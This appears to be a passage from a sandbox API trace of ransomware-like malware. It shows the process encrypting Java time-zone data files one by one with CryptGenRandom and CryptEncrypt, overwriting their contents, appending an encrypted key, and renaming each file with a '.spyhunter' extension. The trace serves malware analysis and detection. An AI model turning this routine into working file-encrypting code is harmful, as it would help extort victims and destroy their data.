(in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar.spyhunter") returned 66 [0169.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar.spyhunter")) returned 1 [0169.428] GetProcessHeap () returned 0x2c0000 [0169.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.428] GetProcessHeap () returned 0x2c0000 [0169.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.428] GetProcessHeap () returned 0x2c0000 [0169.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc5c0 | out: hHeap=0x2c0000) returned 1 [0169.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e578 | out: pbBuffer=0x248e578) returned 1 [0169.429] GetProcessHeap () returned 0x2c0000 [0169.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.429] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e570*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e570*=0x30) returned 1 [0169.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.429] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi") returned 56 [0169.429] StrStrW (lpFirst="Karachi", lpSrch=".txt") returned 0x0 [0169.429] GetProcessHeap () returned 0x2c0000 [0169.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.429] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e534, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e534*=0x99, lpOverlapped=0x0) returned 1 [0169.430] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.430] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x99, lpNumberOfBytesWritten=0x248e534, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e534*=0x99, lpOverlapped=0x0) returned 1 [0169.430] GetProcessHeap () returned 0x2c0000 [0169.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.430] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.431] WriteFile (in: hFile=0x9c, lpBuffer=0x248e574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e534, lpOverlapped=0x0 | out: lpBuffer=0x248e574*, lpNumberOfBytesWritten=0x248e534*=0x4, lpOverlapped=0x0) returned 1 [0169.431] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e534, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e534*=0x30, lpOverlapped=0x0) returned 1 [0169.431] CloseHandle (hObject=0x9c) returned 1 [0169.431] GetProcessHeap () returned 0x2c0000 [0169.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.431] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi.spyhunter") returned 66 [0169.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi.spyhunter")) returned 1 [0169.432] GetProcessHeap () returned 0x2c0000 [0169.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.432] GetProcessHeap () returned 0x2c0000 [0169.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.432] GetProcessHeap () returned 0x2c0000 [0169.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60d80 | out: hHeap=0x2c0000) returned 1 [0169.432] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e578 | out: pbBuffer=0x248e578) returned 1 [0169.432] GetProcessHeap () returned 0x2c0000 [0169.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.432] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e570*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e570*=0x30) returned 1 [0169.432] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.432] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka") returned 58 [0169.433] StrStrW (lpFirst="Kamchatka", lpSrch=".txt") returned 0x0 [0169.433] GetProcessHeap () returned 0x2c0000 [0169.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.433] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e534, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e534*=0x245, lpOverlapped=0x0) returned 1 [0169.433] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.433] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x248e534, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e534*=0x245, lpOverlapped=0x0) returned 1 [0169.434] GetProcessHeap () returned 0x2c0000 [0169.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.434] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.434] WriteFile (in: hFile=0x9c, lpBuffer=0x248e574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e534, lpOverlapped=0x0 | out: lpBuffer=0x248e574*, lpNumberOfBytesWritten=0x248e534*=0x4, lpOverlapped=0x0) returned 1 [0169.434] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e534, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e534*=0x30, lpOverlapped=0x0) returned 1 [0169.434] CloseHandle (hObject=0x9c) returned 1 [0169.434] GetProcessHeap () returned 0x2c0000 [0169.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.434] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka.spyhunter") returned 68 [0169.434] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka.spyhunter")) returned 1 [0169.435] GetProcessHeap () returned 0x2c0000 [0169.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.435] GetProcessHeap () returned 0x2c0000 [0169.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.435] GetProcessHeap () returned 0x2c0000 [0169.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba480 | out: hHeap=0x2c0000) returned 1 [0169.435] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e570 | out: pbBuffer=0x248e570) returned 1 [0169.435] GetProcessHeap () returned 0x2c0000 [0169.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.435] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e568*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e568*=0x30) returned 1 [0169.435] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.436] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul") returned 54 [0169.436] StrStrW (lpFirst="Kabul", lpSrch=".txt") returned 0x0 [0169.436] GetProcessHeap () returned 0x2c0000 [0169.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.436] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e52c*=0x41, lpOverlapped=0x0) returned 1 [0169.437] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.437] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e52c*=0x41, lpOverlapped=0x0) returned 1 [0169.437] GetProcessHeap () returned 0x2c0000 [0169.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.437] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.437] WriteFile (in: hFile=0x9c, lpBuffer=0x248e56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e52c, lpOverlapped=0x0 | out: lpBuffer=0x248e56c*, lpNumberOfBytesWritten=0x248e52c*=0x4, lpOverlapped=0x0) returned 1 [0169.437] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e52c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e52c*=0x30, lpOverlapped=0x0) returned 1 [0169.437] CloseHandle (hObject=0x9c) returned 1 [0169.437] GetProcessHeap () returned 0x2c0000 [0169.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.438] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul.spyhunter") returned 64 [0169.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul.spyhunter")) returned 1 [0169.438] GetProcessHeap () returned 0x2c0000 [0169.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.438] GetProcessHeap () returned 0x2c0000 [0169.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.438] GetProcessHeap () returned 0x2c0000 [0169.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27370 | out: hHeap=0x2c0000) returned 1 [0169.438] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e570 | out: pbBuffer=0x248e570) returned 1 [0169.438] GetProcessHeap () returned 0x2c0000 [0169.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.439] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e568*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e568*=0x30) returned 1 [0169.439] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.439] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem") returned 58 [0169.439] StrStrW (lpFirst="Jerusalem", lpSrch=".txt") returned 0x0 [0169.439] GetProcessHeap () returned 0x2c0000 [0169.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.439] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e52c*=0x4d4, lpOverlapped=0x0) returned 1 [0169.560] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.560] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4d4, lpNumberOfBytesWritten=0x248e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e52c*=0x4d4, lpOverlapped=0x0) returned 1 [0169.560] GetProcessHeap () returned 0x2c0000 [0169.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.560] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.560] WriteFile (in: hFile=0x9c, lpBuffer=0x248e56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e52c, lpOverlapped=0x0 | out: lpBuffer=0x248e56c*, lpNumberOfBytesWritten=0x248e52c*=0x4, lpOverlapped=0x0) returned 1 [0169.560] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e52c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e52c*=0x30, lpOverlapped=0x0) returned 1 [0169.560] CloseHandle (hObject=0x9c) returned 1 [0169.561] GetProcessHeap () returned 0x2c0000 [0169.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.561] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem.spyhunter") returned 68 [0169.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem.spyhunter")) returned 1 [0169.639] GetProcessHeap () returned 0x2c0000 [0169.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.639] GetProcessHeap () returned 0x2c0000 [0169.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.639] GetProcessHeap () returned 0x2c0000 [0169.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba3c0 | out: hHeap=0x2c0000) returned 1 [0169.639] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e568 | out: pbBuffer=0x248e568) returned 1 [0169.639] GetProcessHeap () returned 0x2c0000 [0169.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e560*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e560*=0x30) returned 1 [0169.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.639] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain") returned 56 [0169.640] StrStrW (lpFirst="Bahrain", lpSrch=".txt") returned 0x0 [0169.640] GetProcessHeap () returned 0x2c0000 [0169.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.640] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e524, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e524*=0x4d, lpOverlapped=0x0) returned 1 [0169.640] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.640] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e524, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e524*=0x4d, lpOverlapped=0x0) returned 1 [0169.641] GetProcessHeap () returned 0x2c0000 [0169.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.641] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.641] WriteFile (in: hFile=0x9c, lpBuffer=0x248e564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e524, lpOverlapped=0x0 | out: lpBuffer=0x248e564*, lpNumberOfBytesWritten=0x248e524*=0x4, lpOverlapped=0x0) returned 1 [0169.641] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e524, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e524*=0x30, lpOverlapped=0x0) returned 1 [0169.641] CloseHandle (hObject=0x9c) returned 1 [0169.641] GetProcessHeap () returned 0x2c0000 [0169.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.641] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain.spyhunter") returned 66 [0169.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain.spyhunter")) returned 1 [0169.642] GetProcessHeap () returned 0x2c0000 [0169.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.642] GetProcessHeap () returned 0x2c0000 [0169.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.642] GetProcessHeap () returned 0x2c0000 [0169.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9040 | out: hHeap=0x2c0000) returned 1 [0169.642] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e568 | out: pbBuffer=0x248e568) returned 1 [0169.642] GetProcessHeap () returned 0x2c0000 [0169.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.642] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e560*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e560*=0x30) returned 1 [0169.642] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.643] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad") returned 56 [0169.643] StrStrW (lpFirst="Baghdad", lpSrch=".txt") returned 0x0 [0169.643] GetProcessHeap () returned 0x2c0000 [0169.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.643] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e524, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e524*=0x1e9, lpOverlapped=0x0) returned 1 [0169.643] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.644] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1e9, lpNumberOfBytesWritten=0x248e524, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e524*=0x1e9, lpOverlapped=0x0) returned 1 [0169.644] GetProcessHeap () returned 0x2c0000 [0169.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.644] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.644] WriteFile (in: hFile=0x9c, lpBuffer=0x248e564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e524, lpOverlapped=0x0 | out: lpBuffer=0x248e564*, lpNumberOfBytesWritten=0x248e524*=0x4, lpOverlapped=0x0) returned 1 [0169.644] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e524, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e524*=0x30, lpOverlapped=0x0) returned 1 [0169.644] CloseHandle (hObject=0x9c) returned 1 [0169.644] GetProcessHeap () returned 0x2c0000 [0169.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.644] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad.spyhunter") returned 66 [0169.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad.spyhunter")) returned 1 [0169.645] GetProcessHeap () returned 0x2c0000 [0169.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.645] GetProcessHeap () returned 0x2c0000 [0169.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.645] GetProcessHeap () returned 0x2c0000 [0169.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9b80 | out: hHeap=0x2c0000) returned 1 [0169.645] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e560 | out: pbBuffer=0x248e560) returned 1 [0169.645] GetProcessHeap () returned 0x2c0000 [0169.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.646] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e558*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e558*=0x30) returned 1 [0169.646] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.646] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat") returned 57 